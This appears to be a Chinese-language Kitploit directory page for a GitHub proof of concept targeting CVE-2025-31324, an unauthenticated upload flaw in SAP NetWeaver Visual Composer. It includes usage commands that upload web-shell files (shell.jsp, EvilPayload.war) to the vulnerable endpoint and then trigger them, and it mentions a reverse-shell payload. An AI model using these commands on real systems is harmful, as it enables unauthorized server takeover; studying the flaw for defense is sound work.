Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-31324_PoC — CVE-2025-31324 的概念验证:SAP NetWeaver Visual Composer Metadata Uploader 中的未认证上传漏洞 | Kitploit
工具/GitHubGitHub/odst-forge/cve-2025-31324_poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

CVE-2025-31324 的概念验证:SAP NetWeaver Visual Composer Metadata Uploader 中的未认证上传漏洞

查看仓库
621年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-31324_PoC

针对CVE-2025-31324的利用验证:SAP NetWeaver Visual Composer元数据上传器中的未授权上传

该脚本执行:

  1. 向存在漏洞的端点上传文件(通过上传主机/端口)
  2. 可选地通过HTTP GET触发(通过触发主机/端口)
  3. 基本响应验证/日志记录

使用示例: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

您还可以上传.war文件(如果您想以这种方式执行)。cache.jsp是一个反向Shell,一旦进入系统即可获得访问权限。(仍在解决其中的问题)

免责声明

此内容仅供教育目的,不得用于任何恶意活动。在测试或研究安全漏洞时,请始终确保拥有必要的权限并遵循道德准则。

如有任何问题或澄清需求,请随时联系。保持安全与防护!

下载工具